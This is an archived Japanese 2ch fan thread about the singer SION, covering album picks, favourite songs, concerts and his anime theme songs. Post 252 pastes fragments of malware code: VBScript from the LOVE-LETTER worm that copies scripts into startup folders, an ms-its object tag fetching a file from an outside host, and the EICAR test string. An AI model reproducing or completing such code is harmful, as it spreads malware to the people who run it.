167 :NO MUSIC NO NAME:2005/11/18(金) 23:39:29 ID:1judvKEC
iTMSにEMI時代のしか出てない。。。

168 :NO MUSIC NO NAME:2005/11/25(金) 19:47:27 ID:D4Ki7RLU
他のところは知らないけど、どこもこんなに人いないの?

169 :NO MUSIC NO NAME:2005/11/26(土) 02:05:41 ID:LS7NTkKn
ネタが無いんじゃないか?
燃料投下待ち

170 :NO MUSIC NO NAME:2005/11/26(土) 14:18:46 ID:5rw+v1mt
来月17日行ってくるわ

171 :NO MUSIC NO NAME:2005/11/27(日) 02:51:10 ID:B55n5M24
12日楽しみだ

172 :NO MUSIC NO NAME:2005/12/01(木) 10:36:50 ID:6AM40ZdT
「腑抜けたラップを聴く暇があったら俺を真っ先にSIONを聴く」
BOSSのこれでSION聴いてみたいと思ったんだんだけどどのアルバムがおすすめ?
ちなみにハードなやつよりソフトでお願いします。

173 :NO MUSIC NO NAME:2005/12/01(木) 15:41:39 ID:CNbKctHG
デビューからのを、まとめてあるベスト盤
2枚組みの奴

タイトルは・・・調べて。すまん

174 :NO MUSIC NO NAME:2005/12/01(木) 15:46:49 ID:GO26BHMC
>>172
俺は「夜しか泳げない」から入ってハマッたよ
7曲目の「遊ぼうよ」、8曲目の「12号室」は名曲

で一番好きな曲は、「かわいい女」の6曲目の「元気か?」

175 :NO MUSIC NO NAME:2005/12/01(木) 15:58:28 ID:6AM40ZdT
二人ともレスありがとう。調べたんだけど「俺の声」買おうと思ってるよ。
てか福山とのやつしかまだ聴いてないんだけどSIONって昔からこんな声なの?

176 :NO MUSIC NO NAME:2005/12/02(金) 11:21:33 ID:cv3fgZlk
>>175
昔からこんな声ですよ。

177 :NO MUSIC NO NAME:2005/12/02(金) 13:01:06 ID:4KrVhv3C
しゃがれてるのは同じだけど
昔の曲は声が若いよな

178 :NO MUSIC NO NAME:2005/12/02(金) 16:57:37 ID:8BmuZILc
SIONの自主製作盤の時の「俺の声」「街は今日も雨さ」はたまらんかった.
まじで眠っていた何かが振るえ出しそうで...

自作着うたにしてもガラガラ声がただの音割れに聞こえる恐怖.
ああ女神様.

179 :NO MUSIC NO NAME:2005/12/06(火) 11:56:30 ID:2aNPGk0H
 

180 :NO MUSIC NO NAME:2005/12/08(木) 21:32:39 ID:rtAXP+AZ
今日はやっぱり「12月」を聴いて泣きたいね

181 :NO MUSIC NO NAME:2005/12/09(金) 09:52:12 ID:XGVvNWQG
12月

街はクリスマス気分

俺はいつも

この頃になると

何か

何かやり残したような

やわらかな後悔をする

「12月」良いな...なんか良いなぁ...

午前三時の街角もなんか良いわ.

182 :NO MUSIC NO NAME:2005/12/15(木) 00:28:34 ID:4B9Xenme
この間、福山雅治がラジオのコーナーの一部でリスナーのリクエストに答えて「12月」を歌っていました。SIONさんについては全然知らないんですが、いい曲ですね

183 :NO MUSIC NO NAME:2005/12/15(木) 22:59:25 ID:IyirHwq1
おととい磔磔(京都)行ってきました。
もうー、最高。
「12月」は弾き語りでやってくれました。
「がんばれ がんばれ」で泣いてた人多数。

184 :NO MUSIC NO NAME:2005/12/16(金) 00:46:45 ID:JjxQcyZD
文さん52歳おめ
今回のライブの3曲目ってなんていう曲ですか?

185 :NO MUSIC NO NAME:2005/12/16(金) 05:17:17 ID:QnjOhvEI
大阪に行ったんだけど、3曲めかあ。忘れたなあ。
東京ノクターンからの曲が少なくて、オレはちょっと残念だった。

186 :NO MUSIC NO NAME:2005/12/16(金) 08:00:22 ID:yv3D3fgX
>>184
「夜しか泳げない」じゃなかったかな。たぶん。

187 :NO MUSIC NO NAME:2005/12/16(金) 14:57:07 ID:QnjOhvEI
おっすごい。
多分次のファンクラブ会報に載るよね。

188 :NO MUSIC NO NAME:2005/12/16(金) 20:13:24 ID:JjxQcyZD
皆さんありがとうございます

189 :NO MUSIC NO NAME:2005/12/18(日) 02:55:30 ID:kyHR67pK
最近SIONの存在を知ったのだけれど、
入門にはどのアルバムから買っていけばいいかな?
オススメがあったら教えてください。

190 :NO MUSIC NO NAME:2005/12/18(日) 10:07:29 ID:S6BeahUf
今入手可能なベストならなんでもいいんじゃないかな。

191 :NO MUSIC NO NAME:2005/12/19(月) 16:17:17 ID:DDmphWi4
ベストも良いが普通に「東京ノクターン」でも良いと思う.

192 :NO MUSIC NO NAME:2005/12/19(月) 20:43:12 ID:AycyJxne
ちょっと渋すぎるんじゃないかな。
いや、オレは東京ノクターンめっちゃ好きだけど。

193 :189:2005/12/19(月) 22:05:19 ID:RBMudMt2
みなさんありがとうございます、買ってきました
とりあえず手近な店には'98>'03ってのと、
俺の声って2枚組みしかなかったんで、両方買ってきました

あとは聴いてみてからAmazonでオススメされたの買ってみます

194 :NO MUSIC NO NAME:2005/12/20(火) 00:13:15 ID:pw40n5yz
初めて聴いてからもう十数年経つが、
いまだに引き込まれて聴き入ってしまう。
SIONの中で、いや邦楽の中で一番好きな曲。
大名曲「12号室」

195 :NO MUSIC NO NAME:2005/12/22(木) 15:43:02 ID:nnbW/rGZ
12号室好きだけどたまにきくくらいが丁度良いね.
彼女は美しかったしね.

割と「影」が僕の中で名曲なんだけどねぇ.
いや「蛍」があれば良いか.
山口県人としては.

196 :NO MUSIC NO NAME:2005/12/23(金) 16:10:05 ID:v+EvjpT7
来年2月のアコースティックライブって
どんな選曲で来るんだろうね
今年のアコースティックライブとは全面的に
曲入れ替えるんだろうか

197 :NO MUSIC NO NAME:2005/12/25(日) 01:06:45 ID:i1flHjUS
もう何年も前にSION’85〜’87の中古CDを500円でなんとなく購入してから
一時期どっぷりとSIONにハマってた。
蛍の頃まではCD買ってたんですが、久しぶりにまたDVDでも購入してみよ
うかと
嫁さんの反応は微妙だと思うけど来年はライブに行きたいな〜

198 :NO MUSIC NO NAME:2005/12/31(土) 12:15:15 ID:/dthuoxk
SIONのライブってカップル率高くない?

199 :NO MUSIC NO NAME:2006/01/01(日) 10:56:53 ID:28HHTqcX
86年に高校だった俺はファーストを何気なく買った
その後ファーストを何百回聞いたよ
それから20年以上シオンを忘れてしまってたが、タワレコでファーストを偶然見つけて買った
今20数年ぶりに聴いたが、全く色褪せてなかったことに感動した
ラストの、街は今日も雨さでは年甲斐もなく泣いてしまった
これを機会に、今のアルバムも聴いてみようと思う

200 :NO MUSIC NO NAME:2006/01/04(水) 00:12:33 ID:inuUKCFj
何この静けさ

201 :NO MUSIC NO NAME:2006/01/06(金) 10:39:10 ID:kMUmgx2U
何この静けさ

202 :NO MUSIC NO NAME:2006/01/06(金) 20:14:30 ID:AMMa1jk8
何佐渡おけさ

203 :NO MUSIC NO NAME:2006/01/07(土) 00:56:17 ID:W25Uvrw6
あんたがたどこさ

204 :NO MUSIC NO NAME:2006/01/07(土) 02:14:20 ID:nJaMIy1+
ひごさ

205 :NO MUSIC NO NAME:2006/01/07(土) 14:42:09 ID:ihKvrMT2
ひごどこさ

206 :NO MUSIC NO NAME:2006/01/07(土) 21:31:01 ID:OIk5Ayqm
くっまもっとさ

207 :NO MUSIC NO NAME:2006/01/07(土) 21:56:11 ID:yb+8LYUy

・・・鰐この静けさ

208 :NO MUSIC NO NAME:2006/01/14(土) 12:10:27 ID:Iw4Gfi07
もうじきアコースティックライブだなぁー

209 :NO MUSIC NO NAME:2006/01/15(日) 19:35:55 ID:jV/tYpn/
Near ここまでおいで って廃盤になってるんだね
どこ探してもないや
ここ見てる人は持ってるのかな?

210 :NO MUSIC NO NAME:2006/01/16(月) 19:21:33 ID:v0lLD9r+

シオン小さな声で話そうSION 2
http://music4.2ch.net/test/read.cgi/legend/1120488994/

211 :NO MUSIC NO NAME:2006/01/21(土) 23:38:40 ID:EocQgr/D
うあーい\(^O^)/
シオンのスレッドがある〜嬉しい〜
シオンは中学の頃から大好きです
最近聞いてなかったけどまたバンバン聞きたいです!
うちには黄色い本で昔シオンがラジオをやっていた頃の内容を書いた本があったはずなんだが見当たらない(>_<)
探さないと!

212 :NO MUSIC NO NAME:2006/01/22(日) 21:03:42 ID:FFBz6L9K
>>209
最近中古で100円で買った。嬉しかったけど値段の安さに複雑な気分。
実は俺、Nier_7でSIONを知った口だからこの曲には思い入れがある。
とりあえずアニメの主題歌にSIONを採用したスタッフは神だね。

213 :NO MUSIC NO NAME:2006/01/23(月) 16:48:54 ID:S3Ce3C4H
>>212
209だけど俺もアニメから入った。
wowowのときは何だこの暗い歌は?と思ったけど(中学のとき)
キッズステーション?のときはなんか心に響いてきた。
数年経って、あの歌は誰の歌か調べてsionを知った。
ちょっと遅かったけど今すごく「俺の声」にハマってる。
中学生の俺じゃわからなかったんだな。

214 :NO MUSIC NO NAME:2006/01/26(木) 00:25:29 ID:XbVO+a47


215 :NO MUSIC NO NAME:2006/01/28(土) 01:14:17 ID:Qiiol2oP
アニメって、何にどんな曲が使われてるの?

216 :NO MUSIC NO NAME:2006/01/28(土) 13:04:59 ID:LA9A2QN+
ttp://www.geneon-ent.co.jp/rondorobe/anime/niea/

ちなみに他の挿入曲も激シブ。
ttp://www.amazon.co.jp/exec/obidos/ASIN/B00005HKQT/ref=pd_sim_dp_1/250-3502664-8719449
ライトニン・ホプキンスにジョン・リー・フッカーが流れるアニメ。スゲエ。
SIONの採用といい、スタッフは相当の音楽マニアだろうなー。

217 :NO MUSIC NO NAME:2006/01/29(日) 14:45:02 ID:G94ARaON
アニメの最終回の前の回で
「Near」のカップリングの「影」が凄い効果的に使われてて
これを聴くと凄くジーンときちゃうんだよ
機会があったら見てほしいアニメだな

218 :NO MUSIC NO NAME:2006/01/30(月) 14:19:00 ID:WR5Mn190
アニメ見た人教えて
自分は「Near」のCDは持ってるけど、アニメは見たことない
アニメのなかで「Near」は使われてる?
主題歌の「ここまでおいで」より「Near」の方が曲として好きなんだけど


219 :NO MUSIC NO NAME:2006/01/30(月) 18:55:12 ID:zOYCVoGd
「Near」はNieA_7をイメージして作った曲で、作中には使われてない
「ここまでおいで」が主題歌で「影」が挿入歌かな
俺も「Near」が好き

220 :NO MUSIC NO NAME:2006/01/30(月) 20:53:35 ID:eYY3Q9yC
nearをベストにいれて欲しかったな.
あのベストに入ってるDVDのNearでのSIONのわざとらしい転がり方に惚れた...

NearのCD欲しいけどレコセルでしか買えないのか...
中古でどっかに出回って無いかなー


221 :218:2006/01/30(月) 22:58:42 ID:Q0y+GuN0
>>219
ありがとう
「Near」は隠れた名曲になりそう
SIONライブで「ここまでおいで」は何度か唄ったと思うけど
「Near」を唄ったことって、自分の知る限りではなかった気がする
良い曲なんだけどな
今度レンタル安い日にでもアニメ見てみようかな
シブい挿入歌群でアニメに興味が出た
実はSIONの曲がアニメ主題歌に起用されたのって
レコード会社がプッシュしたからかと思ってたんだけど
そうでもなかったんだな

>220
SIONのCDは全部持ってるんでベストはいいかと思ってたけど
PV収録のDVD付きだと今日はじめて気がついたよ
買い逃すとこだった


222 :NO MUSIC NO NAME:2006/02/02(木) 01:26:56 ID:0kxfO88q
Niea_7のオープニングアニメはいいよ。"ここまでおいで"のPVとしてもいけそう。
ちゃんと猫がでてくるあたりにスタッフのSIONへの愛を感じるねー。是非見て欲しい。

223 :NO MUSIC NO NAME:2006/02/03(金) 11:39:44 ID:Xw9ZC3g6
 

224 :NO MUSIC NO NAME:2006/02/08(水) 14:20:29 ID:9vik22Yw
最近SIONと東京60WATTが何となくかぶる

225 :NO MUSIC NO NAME:2006/02/17(金) 02:06:21 ID:mrOVEcjp
age

226 :NO MUSIC NO NAME:2006/02/21(火) 09:32:54 ID:0MPpBXVI
保守

227 :NO MUSIC NO NAME:2006/03/01(水) 03:04:55 ID:8H8VZ8Yl
人いない

228 :NO MUSIC NO NAME:2006/03/04(土) 15:11:17 ID:i0PN/1iA
水の中にいるようだ

229 :NO MUSIC NO NAME:2006/03/12(日) 19:11:43 ID:2byBx4zg
http://www.amazon.co.jp/exec/obidos/ASIN/B00005K0BB/qid=1142158266/sr=8-2/ref=sr_8_xs_ap_i2_xgl15/249-9642753-0884368

230 :NO MUSIC NO NAME:2006/03/16(木) 12:40:23 ID:VBSfJ64C


231 :NO MUSIC NO NAME:2006/03/24(金) 00:39:55 ID:3MiNzpxR
age

232 :NO MUSIC NO NAME:2006/03/28(火) 03:12:09 ID:JTopsxnY


#&9832;

233 :NO MUSIC NO NAME:2006/04/03(月) 21:33:29 ID:bMsaipki
20年ぐらい前‘HITS’て泉谷&YOUが司会してた音楽番組にチラッと出たSIONの声が凄い印象的だった。
何年後かに焼酎のCMで「アレっ!この声って」て感じでまたSIONの声が心に残った。
それからまた数年‘濱マイク’最終回でSIONに出会った。

234 :NO MUSIC NO NAME:2006/04/12(水) 02:00:51 ID:i8p8JEpn
知ってる人で、SIONさんに顔の雰囲気がよく似てるやつがおるんやけど
そいつ性根が強いんよ。あきらめんっつーかね。で女好き。
コレ系の顔ってコレ系の性格が多いんかねえ?と、たった一人の例で決める俺。


235 :NO MUSIC NO NAME:2006/04/13(木) 13:44:55 ID:+Edlf6g9
ttp://www.ohashi-gym.com/html/boxers/profile.cgi?who=kawashima

236 :NO MUSIC NO NAME:2006/04/14(金) 17:43:00 ID:7zOwzsXT
SION
何やってんの
出てきてよ

237 :NO MUSIC NO NAME:2006/04/15(土) 18:46:28 ID:I/qhf2BA
なんだよ?

238 :NO MUSIC NO NAME:2006/04/18(火) 03:55:25 ID:yqg6ckur
遺骨は海にばら撒くのが最良でしょうか

239 :NO MUSIC NO NAME:2006/04/18(火) 13:17:50 ID:VQTRSnI1
完全な灰にして、たまごのトイレにしてほしいね

240 :NO MUSIC NO NAME:2006/04/18(火) 16:37:42 ID:HZWT0BBR
SION
生きてんならなんか歌ってよ

241 :NO MUSIC NO NAME:2006/04/22(土) 04:47:34 ID:IFsxL+Cr
当時12号室入ってるアルバム出た時雑誌とかで衝撃曲収録みたいな事書いててワクワクしながらぼじけて聞いてたらあのピアノの音とドラムのリズムと歌詞でなぜか怖くなっていっとき飛ばしてました(笑)
当然の事♪が今のぼくにぴったりの曲です…光だけが光じゃな〜い

242 :NO MUSIC NO NAME:2006/04/23(日) 11:30:08 ID:DuMA+ed/
お客さん1000円じゃ、本物の金は買えんでつよ

243 :NO MUSIC NO NAME:2006/04/24(月) 01:23:42 ID:leH8JsqC
今日のSHIBUYA-AXでのライブ、最高でした。

今夜の酒は特別旨いです。

244 :238:2006/04/29(土) 13:25:03 ID:nOlm/USK
>>239
SIONさんらしい回答ですね。ありがとうございます。
じつは、うちにあるのは、わんこの遺骨なんです。シェットランドですね。
金払って買うペット用の墓地みたいなとこに葬られるがなんかいやでして
訊いてみた次第です、ありがとうございます。

245 :NO MUSIC NO NAME:2006/05/04(木) 20:01:35 ID:y8t+FO/+
a

246 :NO MUSIC NO NAME:2006/05/11(木) 12:07:10 ID:pLQbocSX
廃版などによって現在聞くことが困難な曲ってどれくらいありますか?

247 :NO MUSIC NO NAME:2006/05/12(金) 12:57:38 ID:22U+MW8i
ライブ以外はないんじゃない?

248 :NO MUSIC NO NAME:2006/05/16(火) 16:56:46 ID:wXGVeuGS
保守

249 :NO MUSIC NO NAME:2006/05/31(水) 00:22:51 ID:pQ5vlGqa
昔持ってたライブのアルバムに入ってたと思うんですけど
アコーディオンで「傾いた窓に〜」って歌詞の曲を歌ってたと思うんですけど
それってどのアルバムでしたっけ?
TRUE LIVE かな???
既にCDは、引越しで行方不明だし・・・。

250 :NO MUSIC NO NAME:2006/06/25(日) 01:40:39 ID:jZFprT/p
DVD見たか

251 :NO MUSIC NO NAME:2006/07/01(土) 00:00:08 ID:1i+dQ9yD
Disc1のガード下は最高!

252 :NO MUSIC NO NAME:2006/07/02(日) 20:34:31 ID:2jhifCAX
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

253 :NO MUSIC NO NAME:2006/07/09(日) 16:36:45 ID:IbbiSxGw
森重樹一とのコラボ・シングルが、昨日のCDTVで初登場42位だった!

254 :NO MUSIC NO NAME:2006/07/15(土) 19:03:34 ID:CRIEnlgu
なんでDVDでの森重ってあんなにカマっぽいんだ?

255 :NO MUSIC NO NAME:2006/07/18(火) 22:25:09 ID:seQ1vOfx
>>254森重の悪口言うなハゲ!

256 :NO MUSIC NO NAME:2006/07/27(木) 20:15:06 ID:7jA/UvgG
名古屋クアトロ行く人います? チケ買ったら百番台前半だったお

257 :NO MUSIC NO NAME:2006/08/05(土) 20:23:03 ID:epJnIbkR
BS出てる

258 :NO MUSIC NO NAME:2006/08/12(土) 20:32:47 ID:rDYG1RiY
こんなにかかったよ振り返って手を振るまでに
って曲のタイトルってなんですか?

259 :NO MUSIC NO NAME:2006/08/12(土) 22:57:59 ID:/1ubXXoE
>258
薄紫

でも今日最初骨折は心配しましたわ。
井上さんはどうしたの?理由がよく聞こえなかった。


260 :NO MUSIC NO NAME:2006/08/12(土) 23:33:38 ID:/1ubXXoE
>薄紫
今日は一年ぶりに会えて楽しかった。
SIONなんで骨折したんかな・・


261 :NO MUSIC NO NAME:2006/08/13(日) 00:20:29 ID:5kaR2zWU
>>259
>>260
ありがとう!

今日の野音楽しかった!

262 :NO MUSIC NO NAME:2006/08/13(日) 00:24:15 ID:fO1WZr4V
野音のスタッフ空気嫁
ガードえらい堅かったな

263 :NO MUSIC NO NAME:2006/08/14(月) 11:46:06 ID:LKedP6cU
>>262
会場左側BとCブロックの境目に1人、
バカみたいに張り切ってる奴がいた
周りに迷惑もかけてないのに
喫煙、写メ、少し前に出るなど
マニュアルで禁止されてる事項は取りあえず全部注意
SIONの客は大人が多いから諍い起きなかったが
荒くれた輩がいたら暴動になりかねないほど
うざいバイト君だったよ

まあライブは井上さん欠場だったにも拘わらず最高だったね
森重のゲストも予想通りだったが、それでも嬉しかった

264 :NO MUSIC NO NAME:2006/08/14(月) 12:25:17 ID:hSFkiN1G
ダメなものはダメです

265 :NO MUSIC NO NAME:2006/08/16(水) 14:32:57 ID:SK1+vWgO
>>263
二度とライブくんな


266 :NO MUSIC NO NAME:2006/08/25(金) 21:45:01 ID:BTDKvIyn
右腕って同じところ十数回も折ってるの?!

267 :NO MUSIC NO NAME:2006/09/05(火) 19:09:37 ID:0+d8/Ooc
youtubeにあがってるSION物、他にもあったら教えて

通報されるくらいに
http://www.youtube.com/watch?v=SG_AS_hwZuQ

Sorry Baby
http://www.youtube.com/watch?v=ha8WPto1V8U

Sorry Baby
http://www.youtube.com/watch?v=JDq0nFQ5VEc

俺の声
http://www.youtube.com/watch?v=ukGOkjtwSyM

水の中にいるようだ
http://www.youtube.com/watch?v=PeEuwDZXfx0

春夏秋冬
http://www.youtube.com/watch?v=gvMIjY4zsCw

Niea_7 [OP](ここまでおいで)
http://www.youtube.com/watch?v=t7tBlTHLokA


268 :NO MUSIC NO NAME:2006/09/08(金) 23:12:03 ID:U5CesxsQ
今SIONスレってここだけかな?

269 :NO MUSIC NO NAME:2006/09/11(月) 19:01:28 ID:R7KqeqxJ
ありがてぇ♪に出会ってから13年くらい経つかな。ここ3年くらいシオンから遠のいていましたが。ここの書き込みを見つけて、懐かしさと嬉しさがジュワっと湧きました。今夜は久しぶり発泡酒とシオンで過ごしてみます。

270 :NO MUSIC NO NAME:2006/09/13(水) 10:03:10 ID:NzBEtvse
↑の動画をみて体に電流がはしりました。bestが複数出てるけど何を買えばいいかな?水の中にいるようだが好きなんだけど…。携帯からスマソ

271 :NO MUSIC NO NAME:2006/09/14(木) 22:04:19 ID:xE4dMU+j
あなげ自分

272 :NO MUSIC NO NAME:2006/09/14(木) 23:23:29 ID:6IlhJH5T
>>270
「水の中に〜」ならツイン・ベリーベスト・コレクションに入ってる。
なおツイン・ベリーベスト、俺の声、'98>'03と、完全にダブってる曲はほとんどないので
(シングルとアルバムのバージョン違い、後年の再録音は一応別カウント)、この際全部
行っとくのもよろしいかと。

273 :NO MUSIC NO NAME:2006/09/15(金) 17:05:57 ID:fJWsklJ0
サンスポに記事出てた
http://www.sanspo.com/fight/top/f200609/f2006091501.html

274 :NO MUSIC NO NAME:2006/09/16(土) 02:33:36 ID:FqYMkWI5
>273
誤爆だよな?

シオン、久しぶりに聞いてみた。
やっぱいいな。
好きなときに跳べ、迄しか持ってないけど。


275 :NO MUSIC NO NAME:2006/09/17(日) 18:17:04 ID:krKG7TNk
>>272
サンクスです
自分は学生で金ないのでとりあえずは「水の中に〜」が入ってる
ツイン・ベリーベスト買ってみますね。

276 :NO MUSIC NO NAME:2006/09/19(火) 21:14:48 ID:wgE/PTEN
会社帰りにiPODで
SIONの「早く帰ろう」を控えめな音量で聞く

夕方の電車にゆれる自分
つり革の疲れた顔のサラリーマンのおっさん
じっと携帯にらんでメールをうってるOL
ちょっと物悲しい風景、でもすこしうれしい

こんなSIONの歌すきだなぁ

277 :NO MUSIC NO NAME:2006/09/21(木) 12:29:32 ID:tKCTiG12
サイレンが鳴り響く♪

278 :NO MUSIC NO NAME:2006/09/22(金) 15:42:29 ID:hx5tohcU
昨日、BSフジでお昼にやってた音楽番組MUSIC・Sで
久々にSIONが歌ってるのを観て、痺れまくってしまったので
探してこのスレにやってきました。
SIONって、80年代の頃からなんとなくは知ってたけど
じっくり聴くとホントいいですね。
SIONの歌、声、世界観、魂から滲み出るような優しさがあるんだよな。
ということで、>>272のお勧めを参考にして改めてアルバム購入してみる。
個人的に一番好きな曲は、やはり「SORRYBABY」

279 :NO MUSIC NO NAME:2006/10/05(木) 07:36:48 ID:SWmNPzoP
動画見ましたアップしてくれてありがとう
ストレンジ・バット・トゥルーってのが唯一の2枚組みアルバムです
ベストは良く知りません
その次の夜しか泳げないのアルバムから仲井戸麗市さんがちょくちょく参加してます。
丁度ルーザーの頃だったかな。
動画 通報されるくらいに のドラム ポンタさんもルーザーでしたね。
懐かしくて熱いものがこみ上げてきました。

ついでに泉谷の動画も見てしまいましたとさ。

280 :NO MUSIC NO NAME:2006/10/11(水) 01:47:22 ID:6porI6bl
遥か昔、「小堀勝啓のわ WIDE!〜とにかく今夜がパラダイス」
っていう、生のラジオに、SIONがゲストに来ていたが、
途中で帰っちゃったのを思い出した。

>>267 動画どうもです。不眠の上にこの時間帯に聴くと涙腺がやばい。

281 :NO MUSIC NO NAME:2006/10/12(木) 00:07:06 ID:MQo65vlo
久しぶりに2チャンのシオンスレに来ました。長崎にまた来てくれるのでうれしいです。

282 :NO MUSIC NO NAME:2006/10/20(金) 21:39:17 ID:0l6CqHvW
http://music6.2ch.net/test/read.cgi/legend/1085164448/l50

283 :NO MUSIC NO NAME:2006/10/31(火) 15:14:17 ID:lvAII5Ho
>>282
伝説板にも書いたが、
今回の長崎ライブ成功しないと
主催したバーは沈没しちゃうらしい・・・
危険な賭けに出ましたね

284 :NO MUSIC NO NAME:2006/10/31(火) 19:14:34 ID:HPOQgnsk


285 :NO MUSIC NO NAME:2006/10/31(火) 20:08:19 ID:Pd3FAGPH


286 :NO MUSIC NO NAME:2006/11/05(日) 13:39:50 ID:bIaCclX3
か、過疎ってる
おーい生存者〜

287 :NO MUSIC NO NAME:2006/11/06(月) 07:42:06 ID:kUiq6lke
ノシ
でもシオンスレってどこもこんな感じに過疎りながらも長く続いてくよね

288 :NO MUSIC NO NAME:2006/11/07(火) 01:01:05 ID:hzwr4mUt
youtubeでシオンの着てるVANSONホスイ。

289 :NO MUSIC NO NAME:2006/11/07(火) 14:11:24 ID:H4jv0Pq+
シオンって結婚してる?

290 :NO MUSIC NO NAME:2006/11/09(木) 21:30:28 ID:uQdLO2pe
してるよ。
私がしたかった…ρ(-ε-)(怖)

291 :NO MUSIC NO NAME:2006/11/11(土) 18:01:22 ID:xsj4qeL+
シオンって子供いるの?

292 :NO MUSIC NO NAME:2006/11/11(土) 19:17:57 ID:CDopzltf
シオンって兄弟いるの?

293 :NO MUSIC NO NAME:2006/11/11(土) 22:44:32 ID:3CTYsEjZ
姉がいたはずだが。
てか、SIONて名前の出所がその姉じゃなかったっけ?

294 :NO MUSIC NO NAME:2006/11/12(日) 19:18:33 ID:BP4WayXY
シオン姉って結婚してるの?

295 :NO MUSIC NO NAME:2006/11/20(月) 15:12:34 ID:WGPkb4qd
昨日、神戸でSION見てきました!!
すごいラッキー。
ライブハウスのイベントのゲストでトリででてきました。
一番後ろから見てましたが、最前列の10人ぐらいしかファンはいなかった。
もったいない。
絶対宣伝不足でした。
たまたま知り合いに教えてもらったから見に行けたけど、
(しかも当日)もう二度とこないだろうな、という雰囲気で
本当にもったいなかったです。

296 :NO MUSIC NO NAME:2006/11/24(金) 16:23:26 ID:R/ZPUJqf
ロフトDVDのDisc1サイコーだ

297 :NO MUSIC NO NAME:2006/11/30(木) 02:06:52 ID:kPR2oHdH
今TVで森重氏の磔磔でのアコースティックライブやってる。
これにシオンが出てたけど、これって関西限定放送ですか?

298 :NO MUSIC NO NAME:2006/11/30(木) 23:59:47 ID:isNL/Nhk
俺たちの愛はスポーツ新聞の

299 :NO MUSIC NO NAME:2006/12/02(土) 21:31:21 ID:/4ofa5hv
長崎でのライブ、出演者で知ってるのはSIONだけなんだけど楽しめるかなぁ・・・

300 :NO MUSIC NO NAME:2006/12/08(金) 19:14:09 ID:vLNdE0UP
明日のバナナホールのチケット今取ってきた。SIONもええが、長州力似の松田文に激萌。

301 :NO MUSIC NO NAME:2006/12/10(日) 17:44:55 ID:u8vsxr3B
長崎でのライブ、出演者で知ってるのはSIONだけなんだけど楽しめるかなぁ・・・


302 :NO MUSIC NO NAME:2006/12/10(日) 21:21:30 ID:tNYXnvDD
昨日長崎のチケットをぴあで買ったよ。整理番号240番だった。結構売れてるのかな。

>>294
姉さんは北海道にいると思う。昔、結婚式に行ったと何かのインタビューで見たような気がする。

>>301
シオンだけ見るだけでも良いんじゃないかと思いますが、花田さんも良いよ。

303 :NO MUSIC NO NAME:2006/12/11(月) 19:26:10 ID:fmJkpD7y
>>301
SIONは花田裕之に何曲か詞を提供しています。


304 :NO MUSIC NO NAME:2006/12/12(火) 02:31:54 ID:35rYh0zM
左頬の切り傷みたいに見える数条の線は何?
ケンカでもしたのか?

305 :NO MUSIC NO NAME:2007/01/01(月) 20:14:29 ID:UQrB4O5F
おけましておめでとうござります

306 :NO MUSIC NO NAME:2007/01/07(日) 02:29:19 ID:9QwoZOWw
>>304胸の傷跡も気になる。

307 :貯めながら:2007/01/19(金) 21:53:21 ID:PztsWe47
ランジェリーや情報が多いでしょうし。

308 :NO MUSIC NO NAME:2007/01/26(金) 19:13:42 ID:cQ+h2MdF
2月12日に向けて保守しておこう

309 :NO MUSIC NO NAME:2007/02/09(金) 09:08:28 ID:7RagC4tq
youtubeで見て覗きにきたら、過疎ってますね

310 :NO MUSIC NO NAME:2007/02/10(土) 00:09:43 ID:NSVg05AX
>>304
>>306
新宿の献血です
ヤンチャしてた頃のお話です。

311 :NO MUSIC NO NAME:2007/02/13(火) 22:46:20 ID:IaACpT5u
昨日のライヴはどうだったんかなぁ?!


312 :NO MUSIC NO NAME:2007/02/14(水) 21:35:40 ID:iqE/7K2t
明日の一彦ライヴ、長崎のみんなで盛り上げて、SION&MOGAMIで来てもらおうゼィ♪

56 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)